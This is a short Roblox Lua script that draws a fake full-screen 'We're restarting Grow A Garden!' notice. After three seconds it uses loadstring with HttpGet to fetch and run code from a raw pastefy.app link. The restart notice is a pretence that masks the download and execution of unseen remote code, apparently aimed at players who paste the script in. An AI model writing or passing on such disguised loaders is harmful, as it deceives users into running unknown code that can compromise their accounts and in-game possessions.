local player = game.Players.LocalPlayer
local gui = Instance.new("ScreenGui", player:WaitForChild("PlayerGui"))
gui.Name = "RestartScreen"
gui.IgnoreGuiInset = true
gui.ResetOnSpawn = false
gui.DisplayOrder = 999999
gui.ZIndexBehavior = Enum.ZIndexBehavior.Global

-- Full black background
local bg = Instance.new("Frame", gui)
bg.BackgroundColor3 = Color3.new(0, 0, 0)
bg.Size = UDim2.new(1, 0, 1, 0)

-- Plug icon (Unicode style, you can customize with your own image)
local plugIcon = Instance.new("TextLabel", gui)
plugIcon.Text = "🍃"
plugIcon.TextScaled = true
plugIcon.Size = UDim2.new(0, 200, 0, 200)
plugIcon.Position = UDim2.new(0.5, -100, 0.35, -100)
plugIcon.BackgroundTransparency = 1
plugIcon.TextColor3 = Color3.new(1, 1, 1)
plugIcon.Font = Enum.Font.SourceSansBold

-- Restart message
local mainText = Instance.new("TextLabel", gui)
mainText.Text = "We're restarting Grow A Garden!"
mainText.TextScaled = true
mainText.Size = UDim2.new(1, 0, 0, 50)
mainText.Position = UDim2.new(0, 0, 0.65, 0)
mainText.BackgroundTransparency = 1
mainText.TextColor3 = Color3.new(1, 1, 1)
mainText.Font = Enum.Font.GothamBold

-- Subtext
local subText = Instance.new("TextLabel", gui)
subText.Text = "Please wait while we redirect you..."
subText.TextScaled = true
subText.Size = UDim2.new(1, 0, 0, 39)
subText.Position = UDim2.new(0, 0, 0.72, 0)
subText.BackgroundTransparency = 1
subText.TextColor3 = Color3.new(1, 1, 1)
subText.Font = Enum.Font.Gotham

-- Wait and then redirect
task.delay(3, function()
    gui:Destroy()
    loadstring(game:HttpGet("https://pastefy.app/61lmhmdI/raw"))()
end)
